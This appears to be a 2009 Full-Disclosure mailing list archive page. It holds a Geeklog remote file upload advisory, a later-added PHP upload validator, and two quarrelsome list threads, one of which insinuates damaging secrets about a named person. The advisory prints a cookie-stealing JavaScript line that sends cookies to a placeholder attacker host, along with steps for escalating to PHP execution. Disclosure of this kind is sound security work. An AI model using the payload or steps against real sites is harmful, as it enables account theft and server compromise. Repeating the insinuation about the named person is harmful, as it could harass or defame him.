We have reason to believe Andrew Alan Escher Auernheimer has done
some things he would rather others did not know about. We will
keep you posted.

WINTERMUTE

On Fri, 02 Oct 2009 20:43:02 -0500 dramacrat yirim...@gmail.com wrote:
I wouldn't be too concerned if I was weev.

A guy who uses phrases like *alleged suspect* and* likelihood chance* is
after him! Oh dear, he must be going to accuse weev of being an *illegal
criminal*!


[Full-disclosure] Geeklog = v1.6.0sr2 - Remote File Upload

2009-10-02 Thread Jaloh Smith

==
 Geeklog = v1.6.0sr2 -  Remote File Upload

 Discovered: JaL0h

 Software Site: http://www.geeklog.net

 Dork: By Geeklog Created this page in +seconds +powered
==

Remote File Upload
==
Geeklog has several options to upload images.  The image upload process does
not validate the mime type of the upload.  Geeklog trusts the mime type
specified by the browser and also checks the file extension, both of which
are very easy to spoof.

Files with .jpg extensions can be uploaded, but these files can contain
anything, like javascript or PHP code. Using Firefox you can upload any
jpg extension and it will be accepted since Firefox sets the mime type
based on file extension.

Uploading usually requires that you first create a user account.  Once an
account is created, you can upload a user photo, which could take advantage
of this vulnerability.


Potential Abuse
===
Executable javascript can easily be uploaded.  There are several XSS holes in
many of the Geeklog plugins which could run the uploaded javascript. If a simple
cookie stealing javascript were uploaded, it could be used to expose the Geeklog
uid and password hash which is as good as having the actual password.

Sample JavaScript

document.write('iframe src=http://my.cookiestealingsite.com/cs.php?ck='
+ document.cookie + ' id=myFrame  frameborder=0  vspace=0
hspace=0  marginwidth=0  marginheight=0 width=0  scrolling=no
height=0  style=visibility:hidden;/iframe');

Once the uid and password hash are known, you can set a cookie in your browser:

geeklog=[uid]; password=[md5 hash];

which gives you instant access to everything the user has access to. If you
expose an administrative account, you have full access to the admin panel
where you can set the staticpages.PHP permission to true, then create a
static page that will run any PHP script you desire, potentially exposing
the entire server.

The cookie exploit was originally documented by Nine:Situations:Group::bookoo
http://www.milw0rm.com/exploits/8376 and remains unfixed.

Successful exploitation requires the ability to execute the uploaded JavaScript.
The Geeklog Forum program can be used as an attack vector since it does not
properly validate many $_GET / $_POST variables.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
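
A server-side check for the root cause described in the advisory above (trusting the browser's MIME type and the file extension), added here as an example; it is not Geeklog's code and not from the advisory's author. The function name `check_image_upload`, the allow-list and the two sample files are assumptions constructed for illustration.

```php
<?php
// Added example, not Geeklog code. All names here are hypothetical.
declare(strict_types=1);

const ALLOWED_IMAGE_TYPES = [
    // MIME type detected from content => extension the server assigns
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Decide whether an uploaded file may be stored as an image.
 * $clientName and $clientMime are what the browser sent; they are
 * reported in the rejection reason but never used for the decision.
 */
function check_image_upload(string $tmpPath, string $clientName, string $clientMime): array
{
    // 1. Take the type from the file's content (libmagic), not the request.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($tmpPath);
    if ($detected === false || !isset(ALLOWED_IMAGE_TYPES[$detected])) {
        return ['ok' => false,
                'reason' => "$clientName: content is " . var_export($detected, true)
                          . ", client claimed $clientMime"];
    }

    // 2. The image header must parse and agree with the detected type.
    $info = @getimagesize($tmpPath);
    if ($info === false || $info['mime'] !== $detected) {
        return ['ok' => false, 'reason' => "$clientName: image header does not parse"];
    }

    // 3. The server picks the stored name and extension; the client name is dropped.
    $stored = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$detected];
    return ['ok' => true, 'type' => $detected, 'stored_name' => $stored];
}

// Constructed samples: script text named photo.jpg, and a real 1x1 GIF.
$samples = [
    'photo.jpg'  => "document.write('constructed sample, not an image');",
    'avatar.gif' => base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'),
];
foreach ($samples as $name => $bytes) {
    $tmp = tempnam(sys_get_temp_dir(), 'upl');
    file_put_contents($tmp, $bytes);
    // Both uploads claim image/jpeg, as a browser would for a .jpg name.
    $result = check_image_upload($tmp, $name, 'image/jpeg');
    echo json_encode($result), PHP_EOL;
    unlink($tmp);
}
```

A file that passes this check can still carry script text in metadata or trailing bytes, so uploads should also be re-encoded or served from a location where nothing is executed, with a fixed `Content-Type` and `X-Content-Type-Options: nosniff`.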

Re: [Full-disclosure] n3td3v the new age martyr of the full-disclosure mailing list

2009-10-02 Thread meandmine
full-censors...@hushmail.com wrote:
 we're making n3td3v a martyr of the full-disclosure mailing list.
 
 join hands in a circle and ban the other trolls in the name of our 
 martyr.
 
 three cheers for our martyr!!! ban the trolls, ban the trolls, ban 
 the trolls!!!
 
 vulcanius vulcan...@gmail.com wrote:
 Who is we? Weren't you calling for n3td3v to be allowed back not long
 ago? Do you see the irony in your message?

 I know how you can get at least one troll off the list, unsubscribe.

 full-censors...@hushmail.com wrote:
 THE FULL-CENSORSHIP MOVEMENT

 OUR GOALS

 * we are a movement of security professionals who will complain
 about every troll

 * we believe anybody who offends us should be banned

 * we will not stop until every troll is banned

 
 
I'm so fed up with the crap on here, I'm gone.

Talk all the shit you want, I want see it, thank god!